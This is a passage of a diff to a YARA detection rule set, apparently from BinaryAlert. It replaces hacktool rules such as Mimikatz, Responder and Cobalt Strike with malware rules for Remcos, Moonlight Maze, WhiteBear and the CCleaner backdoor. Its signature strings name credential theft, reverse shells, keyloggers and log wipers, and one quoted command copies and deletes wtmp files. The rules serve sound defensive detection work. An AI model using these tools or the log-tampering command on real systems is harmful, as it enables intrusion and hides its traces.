-		$s5 = "63688c4f211155c76f2948ba21ebaf83" fullword ascii wide
-		$s6 = "ABPTTSClient-log.txt" fullword ascii wide
+		$a1 = "[Following text has been pasted from clipboard:]" wide ascii
+		$a2 = "[Chrome StoredLogins found, cleared!]" wide ascii
+		$a3 = "[Firefox StoredLogins cleared!]" wide ascii
+		$b1 = "getclipboard" wide ascii
+		$b2 = "stopmiccapture" wide ascii
+		$b3 = "downloadfromurltofile" wide ascii
+		$b4 = "getcamsingleframe" wide ascii
+		$c1 = "Breaking-Security.Net" wide ascii
+		$c2 = "REMCOS v" wide ascii
 
 	condition:
-		any of them
+		any of ( $a* ) or 3 of ( $b* ) or all of ( $c* )
 }
-rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE
 {
 	meta:
-		description = "intercepts ssh connections to capture credentials"
-		author = "@fusionrace"
-		id = "fa8362e2-83d3-5830-8952-502684ad66f9"
+		description = "Rule to detect log cleaner based on wipe.c"
+		author = "Kaspersky Lab"
+		id = "35060c3d-b805-54a6-a241-eb6e99168fa8"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/jtesta/ssh-mitm"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12"
+		reference = "http://www.afn.org/~afn28925/wipe.c"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9"
-		score = 50
+		hash = "e69efc504934551c6a77b525d5343241"
+		logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$a1 = "INTERCEPTED PASSWORD:" wide ascii
-		$a2 = "more sshbuf problems." wide ascii
+		$a1 = "ERROR: Unlinking tmp WTMP file."
+		$a2 = "USAGE: wipe [ u|w|l|a ] ...options..."
+		$a3 = "Erase acct entries on tty :   wipe a [username] [tty]"
+		$a4 = "Alter lastlog entry       :   wipe l [username] [tty] [time] [host]"
 
 	condition:
-		all of ( $a* )
+		( uint32( 0 ) == 0x464c457f ) and ( 2 of them )
 }
-rule BINARYALERT_Hacktool_Multi_Pyrasite_Py
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3
 {
 	meta:
-		description = "A tool for injecting arbitrary code into running Python processes."
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
 		author = "@fusionrace"
-		id = "0acd0044-a41c-5e9e-bb94-301cd704cf9d"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/lmacken/pyrasite"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_pyrasite_py.yara#L1-L24"
+		id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "7f3f3df5bd5c1bee2d85ff97878ad36223ab743926a5f8f1c079b039f724abc9"
+		hash = "b099b82acb860d9a9a571515024b35f0"
+		logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "WARNING: ptrace is disabled. Injection will not work." fullword ascii wide
-		$s2 = "A payload that connects to a given host:port and receives commands" fullword ascii wide
-		$s3 = "A reverse Python connection payload." fullword ascii wide
-		$s4 = "pyrasite - inject code into a running python process" fullword ascii wide
-		$s5 = "The ID of the process to inject code into" fullword ascii wide
-		$s6 = "This file is part of pyrasite." fullword ascii wide
-		$s7 = "https://github.com/lmacken/pyrasite" fullword ascii wide
-		$s8 = "Setup a communication socket with the process by injecting" fullword ascii wide
-		$s9 = "a reverse subshell and having it connect back to us." fullword ascii wide
-		$s10 = "Write out a reverse python connection payload with a custom port" fullword ascii wide
-		$s11 = "Wait for the injected payload to connect back to us" fullword ascii wide
-		$s12 = "PyrasiteIPC" fullword ascii wide
-		$s13 = "A reverse Python shell that behaves like Python interactive interpreter." fullword ascii wide
-		$s14 = "pyrasite cannot establish reverse" fullword ascii wide
+		$c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii
+		$c2 = "IsLoaderAlreadyWork" wide ascii
+		$c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii
+		$c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii
 
 	condition:
-		any of them
+		all of ( $c* )
 }
-rule BINARYALERT_Hacktool_Multi_Responder_Py
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger
 {
 	meta:
-		description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server"
-		author = "@fusionrace"
-		id = "82699a67-8ba1-5535-9183-3c857e60134c"
+		description = "Rule to detect Moonlight Maze 'xk' keylogger"
+		author = "Kaspersky Lab"
+		id = "5623021d-0d70-59b3-ae30-522e81552da0"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b"
+		logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = ""
 
 	strings:
-		$s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide
-		$s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide
-		$s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide
-		$s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
-		$s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide
-		$s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide
-		$s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
+		$a1 = "Log ended at => %s"
+		$a2 = "Log started at => %s [pid %d]"
+		$a3 = "/var/tmp/task" fullword
+		$a4 = "/var/tmp/taskhost" fullword
+		$a5 = "my hostname: %s"
+		$a6 = "/var/tmp/tasklog"
+		$a7 = "/var/tmp/.Xtmp01" fullword
+		$a8 = "myfilename=-%s-"
+		$a9 = "/var/tmp/taskpid"
+		$a10 = "mypid=-%d-" fullword
+		$a11 = "/var/tmp/taskgid" fullword
+		$a12 = "mygid=-%d-" fullword
 
 	condition:
-		any of them
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Masscan
+rule BINARYALERT_Ccleaner_Backdoor
 {
 	meta:
-		description = "masscan is a performant port scanner, it produces results similar to nmap"
-		author = "@mimeframe"
-		id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/robertdavidgraham/masscan"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17"
+		description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection."
+		author = "@fusionrace"
+		id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f"
+		logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "d488e4b61c233293bec2ee09553d3a2f"
+		md5_2 = "b95911a69e49544f9ecc427478eb952f"
+		md5_3 = "063b58879c8197b06d619c3be90506ec"
+		md5_4 = "7690e414e130acf7c962774c05283142"
 
 	strings:
-		$a1 = "EHLO masscan" fullword wide ascii
-		$a2 = "User-Agent: masscan/" wide ascii
-		$a3 = "/etc/masscan/masscan.conf" fullword wide ascii
-		$b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii
-		$b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii
-		$b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii
-		$b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii
+		$s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide
 
 	condition:
-		all of ( $a* ) or any of ( $b* )
+		$s1
 }
-rule BINARYALERT_Hacktool_Multi_Ntlmrelayx
+rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
-		author = "@mimeframe"
-		id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa"
+		description = "Rule to detect log cleaners based on utclean.c"
+		author = "Kaspersky Lab"
+		id = "2dc1b796-c8fe-5a87-9d6b-3a322f4a43ab"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15"
+		reference = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_u_logcleaner.yara#L3-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa"
+		logic_hash = "65fe29075294dfad06f4cca631d5d2f1283c439e9a5913f503fe6e4bb1f5f70a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		md5_1 = "d98796dcda1443a37b124dbdc041fe3b"
+		md5_2 = "73a518f0a73ab77033121d4191172820"
 
 	strings:
-		$a1 = "Started interactive SMB client shell via TCP" wide ascii
-		$a2 = "Service Installed.. CONNECT!" wide ascii
-		$a3 = "Done dumping SAM hashes for host:" wide ascii
-		$a4 = "DA already added. Refusing to add another" wide ascii
-		$a5 = "Domain info dumped into lootdir!" wide ascii
+		$a1 = "Hiding complit...n"
+		$a2 = "usage: %s <username> <fixthings> [hostname]"
+		$a3 = "ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmp"
 
 	condition:
-		any of ( $a* )
+		( uint32( 0 ) == 0x464c457f ) and ( any of them )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2
 {
 	meta:
-		description = "Mimikatz credential dump tool: Error messages"
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
 		author = "@fusionrace"
-		id = "94d50739-fc84-5bfe-821d-5e2851f681e3"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16"
+		id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36"
+		hash = "06bd89448a10aa5c2f4ca46b4709a879"
+		logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$s1 = "[ERROR] [LSA] Symbols" fullword ascii wide
-		$s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide
-		$s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide
-		$s4 = "[ERROR] [CRYPTO] Init" fullword ascii wide
+		$b1 = "i cunt waiting anymore #%d" wide ascii
+		$b2 = "lights aint turnt off with #%d" wide ascii
+		$b3 = "Not find process" wide ascii
+		$b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii
+		$b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii
 
 	condition:
-		all of them
+		3 of ( $b* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Files
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto
 {
 	meta:
-		description = "Mimikatz credential dump tool: Files"
-		author = "@fusionrace"
-		id = "ea4fd443-64dd-5466-8525-40c3a023e229"
+		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
+		author = "Costin Raiu, Kaspersky Lab"
+		id = "eb5fc283-4994-5db5-965d-e90caad95f4c"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8"
+		logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
+		md5_1 = "19fbd8cbfb12482e8020a887d6427315"
+		md5_2 = "ea06b213d5924de65407e8931b1e4326"
+		md5_3 = "14ecd5e6fc8e501037b54ca263896a11"
+		md5_4 = "e079ec947d3d4dacb21e993b760a65dc"
+		md5_5 = "edf900cebb70c6d1fcab0234062bfc28"
 
 	strings:
-		$s1 = "kiwifilter.log" fullword wide
-		$s2 = "kiwissp.log" fullword wide
-		$s3 = "mimilib.dll" fullword ascii wide
+		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
 
 	condition:
-		any of them
+		$modulus
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite
+rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool
 {
 	meta:
-		description = "Mimikatz credential dump tool: Author copywrite"
-		author = "@fusionrace"
-		id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6"
+		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
+		author = "Kaspersky Lab"
+		id = "8b943c21-eac7-521d-8dc6-90d611aa4d92"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36"
+		logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8"
-		md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b"
-		md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143"
-		md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
-		md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca"
-		md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703"
+		md5_2 = "8b56e8552a74133da4bc5939b5f74243"
 
 	strings:
-		$s1 = "Kiwi en C" fullword ascii wide
-		$s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide
-		$s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide
-		$s4 = "Build with love for POC only" fullword ascii wide
-		$s5 = "gentilkiwi (Benjamin DELPY)" fullword wide
-		$s6 = "KiwiSSP" fullword wide
-		$s7 = "Kiwi Security Support Provider" fullword wide
-		$s8 = "kiwi flavor !" fullword wide
+		$a1 = "Vnuk: %d" ascii fullword
+		$a2 = "Syn: %d" ascii fullword
+		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
 
 	condition:
-		any of them
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Hot_Potato
+rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
+		description = "Winnti APT group; gzwrite64 imported from loadoerf.ini"
 		author = "@mimeframe"
-		id = "dee13640-b4a9-5a39-af01-338c0197c995"
+		id = "41444dd5-41b9-550c-9124-bc7f41326baa"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/foxglovesec/Potato"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7"
+		hash = "879ce99e253e598a3c156258a9e81457"
+		logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Parsing initial NTLM auth..." wide ascii
-		$a2 = "Got PROPFIND for /test..." wide ascii
-		$a3 = "Starting NBNS spoofer..." wide ascii
-		$a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii
-		$a5 = "Usage: potato.exe -ip" wide ascii
+		$s1 = "loadoerf.ini" fullword ascii wide
+		$s2 = "gzwrite64" fullword ascii wide
 
 	condition:
-		any of ( $a* )
+		all of ( $s* )
 }
-rule BINARYALERT_Hacktool_Windows_Moyix_Creddump
+rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker
 {
 	meta:
-		description = "creddump is a python tool to extract credentials and secrets from Windows registry hives."
+		description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner."
 		author = "@mimeframe"
-		id = "46df781a-abab-5593-99f9-1a6b993904cb"
+		id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/moyix/creddump"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16"
+		reference = "https://github.com/n0fate/chainbreaker"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d"
+		logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii
-		$a2 = "0123456789012345678901234567890123456789" wide ascii
-		$a3 = "NTPASSWORD" wide ascii
-		$a4 = "LMPASSWORD" wide ascii
-		$a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii
-		$a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii
+		$a1 = "[!] Private Key Table is not available" wide ascii
+		$a2 = "[!] Public Key Table is not available" wide ascii
+		$a3 = "[-] Decrypted Private Key" wide ascii
 
 	condition:
 		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts
 {
 	meta:
-		description = "Detection of the PowerShell payloads from Cobalt Strike"
-		author = "@javutin, @joseselvi"
-		id = "155f181a-56cb-5295-a903-744f79012733"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/help-payload-generator"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21"
+		description = "Pulls iCloud Contacts for an account. No dependencies. No user notification."
+		author = "@mimeframe"
+		id = "b6595540-7f89-5764-b34e-d32c1a377b6c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/iCloudContacts"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213"
+		logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ps1 = "Set-StrictMode -Version 2"
-		$ps2 = "func_get_proc_address"
-		$ps3 = "func_get_delegate_type"
-		$ps4 = "FromBase64String"
-		$ps5 = "VirtualAlloc"
-		$ps6 = "var_code"
-		$ps7 = "var_buffer"
-		$ps8 = "var_hthread"
+		$a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii
+		$a2 = "https://p04-contacts.icloud.com/" wide ascii
+		$a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii
+		$a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii
 
 	condition:
-		$ps1 at 0 and filesize < 1000KB and all of ( $ps* )
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE
+rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump
 {
 	meta:
-		description = "Detection of strings in the post-exploitation modules of Cobalt Strike"
-		author = "@javutin, @mimeframe"
-		id = "76c2a5ae-bc7c-50c7-8731-94c75912574f"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/support"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13"
+		description = "For reading OS X keychain passwords as root."
+		author = "@mimeframe"
+		id = "10ee6c24-db35-5178-9a40-92f5231948aa"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/juuso/keychaindump"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8"
+		logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "\\devcenter\\aggressor\\external\\"
+		$a1 = "[-] Too many candidate keys to fit in memory" wide ascii
+		$a2 = "[-] Could not allocate memory for key search" wide ascii
+		$a3 = "[-] Too many credentials to fit in memory" wide ascii
+		$a4 = "[-] The target file is not a keychain file" wide ascii
+		$a5 = "[-] Could not find the securityd process" wide ascii
+		$a6 = "[-] No root privileges, please run with sudo" wide ascii
 
 	condition:
-		filesize > 10KB and filesize < 1000KB and all of ( $s* )
+		4 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Wmi_Implant
+rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough
 {
 	meta:
-		description = "A PowerShell based tool that is designed to act like a RAT"
-		author = "@fusionrace"
-		id = "cd90ef31-6e15-5518-8278-98e99e379916"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21"
+		description = "A simple and easy to use keylogger for macOS."
+		author = "@mimeframe"
+		id = "82d9ff7e-b475-5888-82e1-f65c286a9cde"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/caseyscarborough/keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d"
+		logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
